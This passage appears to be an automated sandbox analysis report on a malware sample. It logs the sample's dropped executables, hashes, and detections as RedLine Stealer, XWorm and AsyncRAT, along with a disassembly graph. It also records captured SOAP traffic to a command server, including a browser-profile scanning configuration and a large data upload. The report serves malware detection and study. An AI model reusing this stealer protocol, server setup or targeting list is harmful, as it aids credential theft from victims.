                  May 26, 2024 01:21:27.187047958 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.187098980 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:27.187567949 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.187586069 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.187638044 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:27.187666893 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.187845945 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.187891006 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:27.187994003 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.188496113 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.188546896 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:27.188575983 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.188786030 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.188795090 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.188841105 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:27.189404011 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.189461946 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:27.189502001 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.189519882 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.189564943 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:27.189675093 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.190340042 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.190393925 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:27.190464973 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.190619946 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.190638065 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.190674067 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:27.190938950 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.190994024 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:27.191235065 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.191348076 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.191396952 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:27.191497087 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.192159891 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.192214012 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:27.192246914 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.192446947 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.192465067 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.192500114 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:27.196172953 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.196190119 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.196227074 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:27.223221064 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.223249912 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.223417044 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:27.223426104 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.223499060 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:27.223514080 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.223738909 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.223927975 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:27.223952055 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.224653959 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.224670887 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.224684954 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.224700928 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.224819899 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:27.224821091 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:27.225141048 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.225192070 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:27.225256920 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.226052046 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.226068974 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.226109028 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:27.226159096 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.226210117 CEST497307000192.168.2.4195.2.75.12
                  May 26, 2024 01:21:27.226373911 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.226610899 CEST700049730195.2.75.12192.168.2.4
                  May 26, 2024 01:21:27.226629019 CEST700049730195.2.75.12192.168.2.4
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  May 26, 2024 01:21:43.848609924 CEST192.168.2.41.1.1.10xbe26Standard query (0)api.ip.sbA (IP address)IN (0x0001)false
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  May 26, 2024 01:21:43.856234074 CEST1.1.1.1192.168.2.40xbe26No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.449737195.2.75.12547627776C:\Users\user\AppData\Local\Temp\r.exe
                  TimestampBytes transferredDirectionData
                  May 26, 2024 01:21:37.679641962 CEST238OUTPOST / HTTP/1.1
                  Content-Type: text/xml; charset=utf-8
                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                  Host: 195.2.75.12:54762
                  Content-Length: 137
                  Expect: 100-continue
                  Accept-Encoding: gzip, deflate
                  Connection: Keep-Alive
                  May 26, 2024 01:21:38.363415956 CEST359INHTTP/1.1 200 OK
                  Content-Length: 212
                  Content-Type: text/xml; charset=utf-8
                  Server: Microsoft-HTTPAPI/2.0
                  Date: Sat, 25 May 2024 23:21:38 GMT
                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                  May 26, 2024 01:21:43.417973042 CEST221OUTPOST / HTTP/1.1
                  Content-Type: text/xml; charset=utf-8
                  SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                  Host: 195.2.75.12:54762
                  Content-Length: 144
                  Expect: 100-continue
                  Accept-Encoding: gzip, deflate
                  May 26, 2024 01:21:43.637818098 CEST25INHTTP/1.1 100 Continue
                  May 26, 2024 01:21:43.778143883 CEST1236INHTTP/1.1 200 OK
                  Content-Length: 4744
                  Content-Type: text/xml; charset=utf-8
                  Server: Microsoft-HTTPAPI/2.0
                  Date: Sat, 25 May 2024 23:21:43 GMT
                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string [TRUNCATED]


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.449739195.2.75.12547627776C:\Users\user\AppData\Local\Temp\r.exe
                  TimestampBytes transferredDirectionData
                  May 26, 2024 01:21:46.935935974 CEST219OUTPOST / HTTP/1.1
                  Content-Type: text/xml; charset=utf-8
                  SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                  Host: 195.2.75.12:54762
                  Content-Length: 930799
                  Expect: 100-continue
                  Accept-Encoding: gzip, deflate
                  May 26, 2024 01:21:48.765877008 CEST294INHTTP/1.1 200 OK
                  Content-Length: 147
                  Content-Type: text/xml; charset=utf-8
                  Server: Microsoft-HTTPAPI/2.0
                  Date: Sat, 25 May 2024 23:21:48 GMT
                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.449740195.2.75.12547627776C:\Users\user\AppData\Local\Temp\r.exe
                  TimestampBytes transferredDirectionData
                  May 26, 2024 01:21:48.774605989 CEST239OUTPOST / HTTP/1.1
                  Content-Type: text/xml; charset=utf-8
                  SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                  Host: 195.2.75.12:54762
                  Content-Length: 930791
                  Expect: 100-continue
                  Accept-Encoding: gzip, deflate
                  Connection: Keep-Alive
                  May 26, 2024 01:21:49.524488926 CEST25INHTTP/1.1 100 Continue
                  May 26, 2024 01:21:49.799566984 CEST25INHTTP/1.1 100 Continue
                  May 26, 2024 01:21:50.592432022 CEST408INHTTP/1.1 200 OK
                  Content-Length: 261
                  Content-Type: text/xml; charset=utf-8
                  Server: Microsoft-HTTPAPI/2.0
                  Date: Sat, 25 May 2024 23:21:50 GMT
                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:19:21:01
                  Start date:25/05/2024
                  Path:C:\Users\user\Desktop\KR6CT3hIxT.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Users\user\Desktop\KR6CT3hIxT.exe"
                  Imagebase:0x7ff7e1db0000
                  File size:7'616'416 bytes
                  MD5 hash:5C95D5493DDA877B228A6485A6D40D9C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:true

                  Target ID:1
                  Start time:19:21:03
                  Start date:25/05/2024
                  Path:C:\Users\user\AppData\Local\Temp\4.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\Temp\4.exe"
                  Imagebase:0xb60000
                  File size:3'597'220 bytes
                  MD5 hash:D7E09993B21575A255D4CEAF706C205A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Antivirus matches:
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 41%, ReversingLabs
                  • Detection: 44%, Virustotal, Browse
                  Reputation:low
                  Has exited:true

                  Target ID:2
                  Start time:19:21:04
                  Start date:25/05/2024
                  Path:C:\Users\user\AppData\Local\Temp\3.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\Temp\3.exe"
                  Imagebase:0xf10000
                  File size:3'275'435 bytes
                  MD5 hash:215F503316C98618DC6DB327477FD26F
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.4149652457.0000000000F12000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000002.4149652457.0000000000F12000.00000040.00000001.01000000.0000000A.sdmp, Author: ditekSHen
                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.4157787084.0000000003381000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Antivirus matches:
                  • Detection: 100%, Avira
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 49%, ReversingLabs
                  • Detection: 55%, Virustotal, Browse
                  Reputation:low
                  Has exited:false

                  Target ID:6
                  Start time:19:21:28
                  Start date:25/05/2024
                  Path:C:\Users\user\AppData\Local\Temp\rdegje.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\Temp\rdegje.exe"
                  Imagebase:0xed0000
                  File size:3'670'637 bytes
                  MD5 hash:823F263A3D860454EF8092594FFB7EC0
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Antivirus matches:
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 34%, ReversingLabs
                  • Detection: 35%, Virustotal, Browse
                  Reputation:low
                  Has exited:true

                  Target ID:7
                  Start time:19:21:28
                  Start date:25/05/2024
                  Path:C:\Users\user\AppData\Local\Temp\r.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\Temp\r.exe"
                  Imagebase:0xe10000
                  File size:3'351'536 bytes
                  MD5 hash:CF1A74B1E40E5C34DF68ADD35DA92129
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2159289645.0000000000E12000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.2159289645.0000000000E12000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000007.00000002.2159289645.0000000000E12000.00000040.00000001.01000000.0000000D.sdmp, Author: unknown
                  Antivirus matches:
                  • Detection: 100%, Avira
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 53%, ReversingLabs
                  • Detection: 53%, Virustotal, Browse
                  Reputation:low
                  Has exited:true

                  Target ID:8
                  Start time:19:21:28
                  Start date:25/05/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7699e0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Reset < >

                    Execution Graph

                    Execution Coverage:11.6%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:27.5%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:23
                    execution_graph 27902 7ff7e1de03e0 27903 7ff7e1de041f 27902->27903 27904 7ff7e1de0497 27902->27904 27906 7ff7e1dcaae0 48 API calls 27903->27906 27905 7ff7e1dcaae0 48 API calls 27904->27905 27907 7ff7e1de04ab 27905->27907 27908 7ff7e1de0433 27906->27908 27909 7ff7e1dcda98 48 API calls 27907->27909 27910 7ff7e1dcda98 48 API calls 27908->27910 27913 7ff7e1de0442 BuildCatchObjectHelperInternal 27909->27913 27910->27913 27911 7ff7e1db1fa0 31 API calls 27912 7ff7e1de0541 27911->27912 27914 7ff7e1db250c SetDlgItemTextW 27912->27914 27913->27911 27915 7ff7e1de05cc 27913->27915 27926 7ff7e1de05c6 27913->27926 27918 7ff7e1de0556 SetDlgItemTextW 27914->27918 27917 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 27915->27917 27916 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 27916->27915 27919 7ff7e1de05d2 27917->27919 27920 7ff7e1de056f 27918->27920 27921 7ff7e1de059c 27918->27921 27920->27921 27923 7ff7e1de05c1 27920->27923 27922 7ff7e1de2320 _handle_error 8 API calls 27921->27922 27924 7ff7e1de05af 27922->27924 27925 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 27923->27925 27925->27926 27926->27916 27934 7ff7e1de20f0 27935 7ff7e1de2106 _com_error::_com_error 27934->27935 27936 7ff7e1de4078 std::_Xinvalid_argument 2 API calls 27935->27936 27937 7ff7e1de2117 27936->27937 27938 7ff7e1de1900 _com_raise_error 14 API calls 27937->27938 27939 7ff7e1de2163 27938->27939 27822 7ff7e1de11cf 27823 7ff7e1de1102 27822->27823 27825 7ff7e1de1900 27823->27825 27851 7ff7e1de1558 27825->27851 27828 7ff7e1de19b4 27832 7ff7e1de1a3d LoadLibraryExA 27828->27832 27834 7ff7e1de1aa9 27828->27834 27835 7ff7e1de1b85 27828->27835 27840 7ff7e1de1abd 27828->27840 27829 7ff7e1de198b 27830 7ff7e1de1868 DloadReleaseSectionWriteAccess 6 API calls 27829->27830 27831 7ff7e1de1998 RaiseException 27830->27831 27844 7ff7e1de1bb5 27831->27844 27833 7ff7e1de1a54 GetLastError 27832->27833 27832->27834 27837 7ff7e1de1a7e 27833->27837 27838 7ff7e1de1a69 27833->27838 27839 7ff7e1de1ab4 FreeLibrary 27834->27839 27834->27840 27859 7ff7e1de1868 27835->27859 27836 7ff7e1de1b1b GetProcAddress 27836->27835 27843 7ff7e1de1b30 GetLastError 27836->27843 27842 7ff7e1de1868 DloadReleaseSectionWriteAccess 6 API calls 27837->27842 27838->27834 27838->27837 27839->27840 27840->27835 27840->27836 27845 7ff7e1de1a8b RaiseException 27842->27845 27846 7ff7e1de1b45 27843->27846 27844->27823 27845->27844 27846->27835 27847 7ff7e1de1868 DloadReleaseSectionWriteAccess 6 API calls 27846->27847 27848 7ff7e1de1b67 RaiseException 27847->27848 27849 7ff7e1de1558 _com_raise_error 6 API calls 27848->27849 27850 7ff7e1de1b81 27849->27850 27850->27835 27852 7ff7e1de15d3 27851->27852 27853 7ff7e1de156e 27851->27853 27852->27828 27852->27829 27867 7ff7e1de1604 27853->27867 27856 7ff7e1de15ce 27858 7ff7e1de1604 DloadReleaseSectionWriteAccess 3 API calls 27856->27858 27858->27852 27860 7ff7e1de1878 27859->27860 27866 7ff7e1de18d1 27859->27866 27861 7ff7e1de1604 DloadReleaseSectionWriteAccess 3 API calls 27860->27861 27862 7ff7e1de187d 27861->27862 27863 7ff7e1de18cc 27862->27863 27864 7ff7e1de17d8 DloadProtectSection 3 API calls 27862->27864 27865 7ff7e1de1604 DloadReleaseSectionWriteAccess 3 API calls 27863->27865 27864->27863 27865->27866 27866->27844 27868 7ff7e1de1573 27867->27868 27869 7ff7e1de161f 27867->27869 27868->27856 27874 7ff7e1de17d8 27868->27874 27869->27868 27870 7ff7e1de1624 GetModuleHandleW 27869->27870 27871 7ff7e1de163e GetProcAddress 27870->27871 27872 7ff7e1de1639 27870->27872 27871->27872 27873 7ff7e1de1653 GetProcAddress 27871->27873 27872->27868 27873->27872 27875 7ff7e1de17fa DloadProtectSection 27874->27875 27876 7ff7e1de183a VirtualProtect 27875->27876 27877 7ff7e1de1802 27875->27877 27879 7ff7e1de16a4 VirtualQuery GetSystemInfo 27875->27879 27876->27877 27877->27856 27879->27876 25459 7ff7e1ddb190 25802 7ff7e1db255c 25459->25802 25461 7ff7e1ddb1db 25462 7ff7e1ddbe93 25461->25462 25463 7ff7e1ddb1ef 25461->25463 25613 7ff7e1ddb20c 25461->25613 26087 7ff7e1ddf390 25462->26087 25466 7ff7e1ddb1ff 25463->25466 25472 7ff7e1ddb2db 25463->25472 25463->25613 25477 7ff7e1ddb207 25466->25477 25479 7ff7e1ddb2a9 25466->25479 25468 7ff7e1ddbeba IsDlgButtonChecked 25469 7ff7e1ddbec9 25468->25469 25475 7ff7e1ddbed5 SendDlgItemMessageW 25469->25475 25476 7ff7e1ddbef0 GetDlgItem IsDlgButtonChecked 25469->25476 25471 7ff7e1ddb391 25810 7ff7e1db22bc GetDlgItem 25471->25810 25472->25471 25473 7ff7e1ddb2f5 25472->25473 25480 7ff7e1dcaae0 48 API calls 25473->25480 25475->25476 26106 7ff7e1dc62dc GetCurrentDirectoryW 25476->26106 25483 7ff7e1dcaae0 48 API calls 25477->25483 25477->25613 25478 7ff7e1ddb2cb EndDialog 25478->25613 25479->25478 25479->25613 25484 7ff7e1ddb313 SetDlgItemTextW 25480->25484 25486 7ff7e1ddb236 25483->25486 25490 7ff7e1ddb326 25484->25490 25485 7ff7e1ddbf47 GetDlgItem 26116 7ff7e1db2520 25485->26116 26120 7ff7e1db1ec4 34 API calls _handle_error 25486->26120 25488 7ff7e1ddb3f5 25508 7ff7e1ddbcc5 25488->25508 25628 7ff7e1ddb3b1 EndDialog 25488->25628 25489 7ff7e1ddb408 GetDlgItem 25494 7ff7e1ddb44f SetFocus 25489->25494 25495 7ff7e1ddb422 IsDlgButtonChecked IsDlgButtonChecked 25489->25495 25499 7ff7e1ddb340 GetMessageW 25490->25499 25490->25613 25493 7ff7e1ddb246 25498 7ff7e1ddb25c 25493->25498 26121 7ff7e1db250c 25493->26121 25500 7ff7e1ddb465 25494->25500 25501 7ff7e1ddb4f2 25494->25501 25495->25494 25517 7ff7e1ddc363 25498->25517 25498->25613 25506 7ff7e1ddb35e IsDialogMessageW 25499->25506 25499->25613 25507 7ff7e1dcaae0 48 API calls 25500->25507 25824 7ff7e1db8d04 25501->25824 25502 7ff7e1ddb3da 25509 7ff7e1db1fa0 31 API calls 25502->25509 25506->25490 25512 7ff7e1ddb373 TranslateMessage DispatchMessageW 25506->25512 25513 7ff7e1ddb46f 25507->25513 25514 7ff7e1dcaae0 48 API calls 25508->25514 25509->25613 25511 7ff7e1ddb52c 25834 7ff7e1ddef80 25511->25834 25512->25490 26124 7ff7e1db129c 25513->26124 25518 7ff7e1ddbcd6 SetDlgItemTextW 25514->25518 26181 7ff7e1de7904 25517->26181 25521 7ff7e1dcaae0 48 API calls 25518->25521 25527 7ff7e1ddbd08 25521->25527 25539 7ff7e1db129c 33 API calls 25527->25539 25528 7ff7e1ddc368 25532 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 25528->25532 25531 7ff7e1ddb498 25536 7ff7e1ddf0a4 24 API calls 25531->25536 25540 7ff7e1ddc36e 25532->25540 25545 7ff7e1ddb4a5 25536->25545 25572 7ff7e1ddbd31 25539->25572 25551 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 25540->25551 25545->25528 25556 7ff7e1ddb4e8 25545->25556 25550 7ff7e1ddbdda 25557 7ff7e1dcaae0 48 API calls 25550->25557 25558 7ff7e1ddc374 25551->25558 25565 7ff7e1ddb5ec 25556->25565 26134 7ff7e1ddfa80 33 API calls 2 library calls 25556->26134 25567 7ff7e1ddbde4 25557->25567 25578 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 25558->25578 25562 7ff7e1db1fa0 31 API calls 25570 7ff7e1ddb586 25562->25570 25575 7ff7e1ddb61a 25565->25575 26135 7ff7e1dc32a8 25565->26135 25588 7ff7e1db129c 33 API calls 25567->25588 25570->25540 25570->25556 25572->25550 25583 7ff7e1db129c 33 API calls 25572->25583 25872 7ff7e1dc2f58 25575->25872 25582 7ff7e1ddc37a 25578->25582 25593 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 25582->25593 25589 7ff7e1ddbd7f 25583->25589 25586 7ff7e1ddb634 GetLastError 25587 7ff7e1ddb64c 25586->25587 25884 7ff7e1dc7fc4 25587->25884 25592 7ff7e1ddbe0d 25588->25592 25595 7ff7e1dcaae0 48 API calls 25589->25595 25609 7ff7e1db129c 33 API calls 25592->25609 25599 7ff7e1ddc380 25593->25599 25600 7ff7e1ddbd8a 25595->25600 25597 7ff7e1ddb60e 26138 7ff7e1dd9d90 12 API calls _handle_error 25597->26138 25610 7ff7e1de7904 _invalid_parameter_noinfo_noreturn 31 API calls 25599->25610 25605 7ff7e1db1150 33 API calls 25600->25605 25603 7ff7e1ddb65e 25607 7ff7e1ddb674 25603->25607 25608 7ff7e1ddb665 GetLastError 25603->25608 25611 7ff7e1ddbda2 25605->25611 25614 7ff7e1ddb71c 25607->25614 25618 